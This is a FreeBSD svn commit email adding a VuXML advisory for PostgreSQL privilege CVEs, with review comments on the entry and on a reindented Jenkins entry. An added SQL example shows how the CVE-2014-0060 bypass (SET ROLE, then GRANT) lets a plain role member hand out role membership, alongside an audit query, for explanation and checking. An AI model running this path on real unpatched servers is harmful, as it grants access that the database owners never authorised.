Date:      Thu, 20 Feb 2014 18:11:25 +0000 (UTC)
From:      Palle Girgensohn <girgen@FreeBSD.org>
To:        ports-committers@freebsd.org, svn-ports-all@freebsd.org, svn-ports-head@freebsd.org
Subject:   svn commit: r345256 - head/security/vuxml
Message-ID:  <201402201811.s1KIBPYr083849@svn.freebsd.org>

Author: girgen
Date: Thu Feb 20 18:11:25 2014
New Revision: 345256
URL: http://svnweb.freebsd.org/changeset/ports/345256
QAT: https://qat.redports.org/buildarchive/r345256/

Log:
  The PostgreSQL Global Development Group has released an important
  update to all supported versions of the PostgreSQL database system,
  which includes minor versions 9.3.3, 9.2.7, 9.1.12, 9.0.16, and
  8.4.20. This update contains fixes for multiple security issues, as
  well as several fixes for replication and data integrity issues.  All
  users are urged to update their installations at the earliest
  opportunity, especially those using binary replication or running a
  high-security application.
  
  This update fixes CVE-2014-0060, in which PostgreSQL did not properly
  enforce the WITH ADMIN OPTION permission for ROLE management. Before
  this fix, any member of a ROLE was able to grant others access to the
  same ROLE regardless if the member was given the WITH ADMIN OPTION
  permission. It also fixes multiple privilege escalation issues,
  including: CVE-2014-0061, CVE-2014-0062, CVE-2014-0063, CVE-2014-0064,
  CVE-2014-0065, and CVE-2014-0066. More information on these issues can
  be found on our security page and the security issue detail wiki page.
  
  Security:	CVE-2014-0060,CVE-2014-0061,CVE-2014-0062,CVE-2014-0063
  		CVE-2014-0064,CVE-2014-0065,CVE-2014-0066,CVE-2014-0067
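The following SQL is an added illustration of the CVE-2014-0060 behaviour the log describes; it is not part of this commit or of the PostgreSQL project's advisory. Role names are hypothetical. The intermediate `SET ROLE` step is the bypass route named in the PostgreSQL 9.3.3 release notes (a plain member could not GRANT directly, but could after switching to the granted role). The audit query at the top is the check a DBA can run on any version to see who actually holds ADMIN OPTION.

```sql
-- Added example (not from the commit or the PostgreSQL advisory).
-- Section 1: run as a superuser on a scratch cluster. Role names are hypothetical.
CREATE ROLE app_admin NOLOGIN;
CREATE ROLE alice LOGIN;
CREATE ROLE bob LOGIN;

-- alice is a plain member of app_admin: no WITH ADMIN OPTION.
GRANT app_admin TO alice;

-- Audit: who may hand out membership in app_admin? Only rows with
-- admin_option = t should be able to GRANT the role onward.
SELECT r.rolname AS role, m.rolname AS member, am.admin_option
  FROM pg_auth_members am
  JOIN pg_roles r ON r.oid = am.roleid
  JOIN pg_roles m ON m.oid = am.member
 WHERE r.rolname = 'app_admin';
--   role     | member | admin_option
--  app_admin | alice  | f

-- Section 2: run in a separate session connected as alice
-- (for example: psql -U alice -d postgres).
-- A direct GRANT is refused on every version, because alice lacks ADMIN OPTION:
GRANT app_admin TO bob;
--   ERROR:  must have admin option on role "app_admin"

-- The CVE-2014-0060 path: switch to the granted role first (allowed, alice
-- is a member), then grant that role onward while acting as the role itself.
SET ROLE app_admin;
GRANT app_admin TO bob;
-- Fixed server (8.4.20 / 9.0.16 / 9.1.12 / 9.2.7 / 9.3.3 or later):
--   ERROR:  must have admin option on role "app_admin"
-- Unfixed server: the GRANT succeeds, and re-running the audit query in
-- Section 1 now lists bob as a member although nobody with ADMIN OPTION
-- (or CREATEROLE) granted it.
RESET ROLE;

-- Section 3: cleanup, back in the superuser session.
DROP ROLE bob;
DROP ROLE alice;
DROP ROLE app_admin;
```

On a fixed server a role is only treated as an admin of itself when it is the session user, so `SET ROLE` no longer confers ADMIN OPTION; rows in `pg_auth_members` with `admin_option = t` remain the only way to delegate membership management.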

Modified:
  head/security/vuxml/vuln.xml

Modified: head/security/vuxml/vuln.xml
==============================================================================
--- head/security/vuxml/vuln.xml	Thu Feb 20 17:42:11 2014	(r345255)
+++ head/security/vuxml/vuln.xml	Thu Feb 20 18:11:25 2014	(r345256)
@@ -51,6 +51,60 @@ Note:  Please add new entries to the beg
 
 -->
 <vuxml xmlns="http://www.vuxml.org/apps/vuxml-1">;
+  <vuln vid="42d42090-9a4d-11e3-b029-08002798f6ff">
+    <topic>PostgreSQL -- multiple privilege issues</topic>
+    <affects>
+      <package>
+	<name>postgresql-server</name>
+	<range><lt>8.4.20</lt></range>
+	<range><ge>9.0.0</ge><lt>9.0.16</lt></range>
+	<range><ge>9.1.0</ge><lt>9.1.12</lt></range>
+	<range><ge>9.2.0</ge><lt>9.2.7</lt></range>
+	<range><ge>9.3.0</ge><lt>9.3.3</lt></range>
+      </package>
+    </affects>
+    <description>
+      <body xmlns="http://www.w3.org/1999/xhtml">;
+	<p>PostgreSQL Project reports:</p>
+	<blockquote cite="http://www.postgresql.org/about/news/1506/">;
+	  <p>This update fixes CVE-2014-0060, in which PostgreSQL did not
+	  properly enforce the WITH ADMIN OPTION permission for ROLE management.
+	  Before this fix, any member of a ROLE was able to grant others access
+	  to the same ROLE regardless if the member was given the WITH ADMIN
+	  OPTION permission. It also fixes multiple privilege escalation issues,
+	  including: CVE-2014-0061, CVE-2014-0062, CVE-2014-0063, CVE-2014-0064,
+	  CVE-2014-0065, and CVE-2014-0066. More information on these issues can
+	  be found on our security page and the security issue detail wiki page.
+	 </p>
+	 <p>
+	  With this release, we are also alerting users to a known security hole
+	  that allows other users on the same machine to gain access to an
+	  operating system account while it is doing "make check":
+	  CVE-2014-0067. "Make check" is normally part of building PostgreSQL
+	  from source code. As it is not possible to fix this issue without
+	  causing significant issues to our testing infrastructure, a patch will
+	  be released separately and publicly. Until then, users are strongly
+	  advised not to run "make check" on machines where untrusted users have
+	  accounts.</p>
+	</blockquote>
+      </body>
+    </description>
+    <references>
+      <cvename>CVE-2014-0060</cvename>
+      <cvename>CVE-2014-0061</cvename>
+      <cvename>CVE-2014-0062</cvename>
+      <cvename>CVE-2014-0063</cvename>
+      <cvename>CVE-2014-0064</cvename>
+      <cvename>CVE-2014-0065</cvename>
+      <cvename>CVE-2014-0066</cvename>
+      <cvename>CVE-2014-0067</cvename>
+    </references>
+    <dates>
+      <discovery>2014-02-20</discovery>
+      <entry>2014-02-20</entry>
+    </dates>
+  </vuln>
+
   <vuln vid="0871d18b-9638-11e3-a371-6805ca0b3d42">
     <topic>phpMyAdmin -- Self-XSS due to unescaped HTML output in import.</topic>
     <affects>
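Review bot: CVE-2014-0067 is listed in `<references>` under the same `<affects>` ranges as the seven fixed CVEs, but the quoted text says it is still open ("a patch will be released separately and publicly"), so `pkg audit` will report 9.3.3 and the other fixed versions as clean for an issue that is not fixed there. Either drop CVE-2014-0067 from this entry and give it its own `<vuln>` once a fixed version exists, or at least say in the topic/description that it remains unpatched. Also, `<references>` carries only `<cvename>` entries while the announcement URL lives solely in the blockquote's `cite` attribute; add `<url>http://www.postgresql.org/about/news/1506/</url>` so the link is shown in audit output. Minor: the `</p>` closing the first paragraph and the `<p>` opening the second are indented one space less than the other lines of the blockquote.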
@@ -101,48 +155,48 @@ Note:  Please add new entries to the beg
 	    <li>
 	      <p>iSECURITY-105</p>
 	      <p>In some places, Jenkins XML API uses XStream to deserialize
-	         arbitrary content, which is affected by CVE-2013-7285 reported
-	         against XStream. This allows malicious users of Jenkins with
-	         a limited set of permissions to execute arbitrary code inside
-	         Jenkins master.</p>
+		 arbitrary content, which is affected by CVE-2013-7285 reported
+		 against XStream. This allows malicious users of Jenkins with
+		 a limited set of permissions to execute arbitrary code inside
+		 Jenkins master.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-76 &amp; SECURITY-88 / CVE-2013-5573</p>
 	      <p>Restrictions of HTML tags for user-editable contents are too
-	         lax. This allows malicious users of Jenkins to trick other
-	         unsuspecting users into providing sensitive information.</p>
+		 lax. This allows malicious users of Jenkins to trick other
+		 unsuspecting users into providing sensitive information.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-109</p>
 	      <p>Plugging a hole in the earlier fix to SECURITY-55. Under some
-	         circimstances, a malicious user of Jenkins can configure job
-	         X to trigger another job Y that the user has no access to.</p>
+		 circimstances, a malicious user of Jenkins can configure job
+		 X to trigger another job Y that the user has no access to.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-108</p>
 	      <p>CLI job creation had a directory traversal vulnerability. This
-	         allows a malicious user of Jenkins with a limited set of
-	         permissions to overwrite files in the Jenkins master and
-	         escalate privileges.</p>
+		 allows a malicious user of Jenkins with a limited set of
+		 permissions to overwrite files in the Jenkins master and
+		 escalate privileges.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-106</p>
 	      <p>The embedded Winstone servlet container is susceptive to
-	         session hijacking attack.</p>
+		 session hijacking attack.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-93</p>
 	      <p>The password input control in the password parameter
-	         definition in the Jenkins UI was serving the actual value of
-	         the password in HTML, not an encrypted one. If a sensitive
-	         value is set as the default value of such a parameter
-	         definition, it can be exposed to unintended audience.</p>
+		 definition in the Jenkins UI was serving the actual value of
+		 the password in HTML, not an encrypted one. If a sensitive
+		 value is set as the default value of such a parameter
+		 definition, it can be exposed to unintended audience.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-89</p>
 	      <p>Deleting the user was not invalidating the API token,
-	         allowing users to access Jenkins when they shouldn't be
-	         allowed to do so.</p>
+		 allowing users to access Jenkins when they shouldn't be
+		 allowed to do so.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-80</p>
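Review bot: this hunk only converts leading spaces to tabs in the Jenkins entry, and the reindented lines keep the typos they already had: `circimstances` in the SECURITY-109 item and `susceptive` in the SECURITY-106 item (should read `circumstances` and `susceptible`); since every one of these lines is being rewritten anyway, fix them here. The log message also says nothing about this whitespace-only change to an unrelated entry; either mention it or split it into its own commit so the PostgreSQL entry's history stays clean.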
@@ -151,52 +205,52 @@ Note:  Please add new entries to the beg
 	    <li>
 	      <p>SECURITY-79</p>
 	      <p>"Jenkins' own user database" was revealing the
-	         presence/absence of users when login attempts fail.</p>
+		 presence/absence of users when login attempts fail.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-77</p>
 	      <p>Jenkins had a cross-site scripting vulnerability in one of its
-	         cookies. If Jenkins is deployed in an environment that allows
-	         an attacker to override Jenkins cookies in victim's browser,
-	         this vulnerability can be exploited.</p>
+		 cookies. If Jenkins is deployed in an environment that allows
+		 an attacker to override Jenkins cookies in victim's browser,
+		 this vulnerability can be exploited.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-75</p>
 	      <p>Jenkins was vulnerable to session fixation attack. If Jenkins
-	         is deployed in an environment that allows an attacker to
-	         override Jenkins cookies in victim's browser, this
-	         vulnerability can be exploited.</p>
+		 is deployed in an environment that allows an attacker to
+		 override Jenkins cookies in victim's browser, this
+		 vulnerability can be exploited.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-74</p>
 	      <p>Stored XSS vulnerability. A malicious user of Jenkins with a
-	         certain set of permissions can cause Jenkins to store
-	         arbitrary HTML fragment.</p>
+		 certain set of permissions can cause Jenkins to store
+		 arbitrary HTML fragment.</p>
 	    </li>
 	    <li>
 	      <p>SECURITY-73</p>
 	      <p>Some of the system diagnostic functionalities were checking a
-	         lesser permission than it should have. In a very limited
-	         circumstances, this can cause an attacker to gain information
-	         that he shouldn't have access to.</p>
+		 lesser permission than it should have. In a very limited
+		 circumstances, this can cause an attacker to gain information
+		 that he shouldn't have access to.</p>
 	    </li>
 	  </ol>
 	  <p>Severity</p>
 	  <ol>
 	    <li>SECURITY-106, and SECURITY-80 are rated <strong>high</strong>. An attacker only
-	        needs direct HTTP access to the server to mount this attack.</li>
+		needs direct HTTP access to the server to mount this attack.</li>
 	    <li>SECURITY-105, SECURITY-109, SECURITY-108, and SECURITY-74 are
-	        rated <strong>high</strong>. These vulnerabilities allow attackes with valid
-	        Jenkins user accounts to escalate privileges in various ways.</li>
+		rated <strong>high</strong>. These vulnerabilities allow attackes with valid
+		Jenkins user accounts to escalate privileges in various ways.</li>
 	    <li>SECURITY-76, SECURIT-88, and SECURITY-89 are rated <strong>medium.</strong>
-	        These vulnerabilities requires an attacker to be an user of
-	        Jenkins, and the mode of the attack is limited.</li>
+		These vulnerabilities requires an attacker to be an user of
+		Jenkins, and the mode of the attack is limited.</li>
 	    <li>SECURITY-93, and SECURITY-79 are <strong>rated</strong> low. These
-	        vulnerabilities only affect a small part of Jenkins and has
-	        limited impact.</li>
+		vulnerabilities only affect a small part of Jenkins and has
+		limited impact.</li>
 	    <li>SECURITY-77, SECURITY-75, and SECURITY-73 are <strong>rated</strong> low. These
-	        vulnerabilities are hard to exploit unless combined with other
-	        exploit in the network.</li>
+		vulnerabilities are hard to exploit unless combined with other
+		exploit in the network.</li>
 	  </ol>
 	</blockquote>
       </body>
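Review bot: as with the previous hunk, these whitespace-only rewrites preserve existing errors in the Jenkins severity list: `attackes` (should be `attackers`), `SECURIT-88` (should be `SECURITY-88`, matching the item list above), `These vulnerabilities requires an attacker to be an user` (should be `require ... a user`), and `affect a small part of Jenkins and has limited impact` (should be `have`). Since the lines are touched anyway, correct them in the same change rather than reindenting the typos.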